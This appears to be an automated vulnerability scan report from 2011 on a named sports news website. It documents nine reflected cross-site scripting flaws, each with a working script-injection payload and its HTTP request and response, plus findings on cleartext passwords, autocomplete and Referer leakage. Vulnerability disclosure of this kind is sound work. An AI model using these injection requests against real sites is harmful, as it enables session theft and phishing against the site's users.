XSS, Cross Site Scripting, www.foxsportsflorida.com, CWE-79, DORK

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Feb 14 11:05:35 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 1]

1.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 2]

1.3. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 3]

1.4. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 4]

1.5. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 5]

1.6. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 6]

1.7. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [blockID parameter]

1.8. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [feedID parameter]

1.9. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [name of an arbitrarily supplied request parameter]

2. Cleartext submission of password

3. Password field with autocomplete enabled

4. Cross-domain Referer leakage

4.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

4.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

5. Cross-domain script include

5.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

5.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

5.3. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html



1. Cross-site scripting (reflected)  next
There are 9 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f15"><script>alert(1)</script>48492c74544 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msnf2f15"><script>alert(1)</script>48492c74544/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:18 GMT
Date: Sat, 12 Feb 2011 02:01:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=521c9dbcd23b5b725f084656bc8def49; path=/
Content-Length: 60924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<form ID='formInvisible' action="/msnf2f15"><script>alert(1)</script>48492c74544/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html">
...[SNIP]...

1.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a896"><script>alert(1)</script>178ef01891b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/022a896"><script>alert(1)</script>178ef01891b/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:19 GMT
Date: Sat, 12 Feb 2011 02:01:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<form ID='formInvisible' action="/msn/022a896"><script>alert(1)</script>178ef01891b/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html">
...[SNIP]...

1.3. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e273"><script>alert(1)</script>d9bccd044a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/112e273"><script>alert(1)</script>d9bccd044a8/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:21 GMT
Date: Sat, 12 Feb 2011 02:01:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<form ID='formInvisible' action="/msn/02/112e273"><script>alert(1)</script>d9bccd044a8/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html">
...[SNIP]...

1.4. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c5f3"><script>alert(1)</script>fadc6c38e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/116c5f3"><script>alert(1)</script>fadc6c38e0/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:22 GMT
Date: Sat, 12 Feb 2011 02:01:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<form ID='formInvisible' action="/msn/02/11/116c5f3"><script>alert(1)</script>fadc6c38e0/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html">
...[SNIP]...

1.5. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a583"><script>alert(1)</script>b4e0bbeaa81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-3a583"><script>alert(1)</script>b4e0bbeaa81/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:23 GMT
Date: Sat, 12 Feb 2011 02:01:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<form ID='formInvisible' action="/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-3a583"><script>alert(1)</script>b4e0bbeaa81/landing_magic_blog.html">
...[SNIP]...

1.6. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b3445<script>alert(1)</script>eb604f924b1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.htmlb3445<script>alert(1)</script>eb604f924b1 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:01:24 GMT
Content-Length: 843
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.htmlb3445<script>alert(1)</script>eb604f924b1"</strong>
...[SNIP]...

1.7. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa69"><script>alert(1)</script>2d8f22f02b9 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660faa69"><script>alert(1)</script>2d8f22f02b9&feedID=3722 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:22 GMT
Date: Sat, 12 Feb 2011 02:01:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="408660faa69"><script>alert(1)</script>2d8f22f02b9">
...[SNIP]...

1.8. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154b5"><script>alert(1)</script>e347fef8b94 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660&feedID=3722154b5"><script>alert(1)</script>e347fef8b94 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:36 GMT
Date: Sat, 12 Feb 2011 02:01:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660^feedID=3722154b5"><script>alert(1)</script>e347fef8b94^',300,500);" rel="nofollow">
...[SNIP]...

1.9. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b494"><script>alert(1)</script>66147e4756a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?5b494"><script>alert(1)</script>66147e4756a=1 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:16 GMT
Date: Sat, 12 Feb 2011 02:01:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="5b494"><script>alert(1)</script>66147e4756a" id = "5b494">
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:06 GMT
Date: Sat, 12 Feb 2011 02:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:06 GMT
Date: Sat, 12 Feb 2011 02:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660&feedID=3722 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:07 GMT
Date: Sat, 12 Feb 2011 02:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
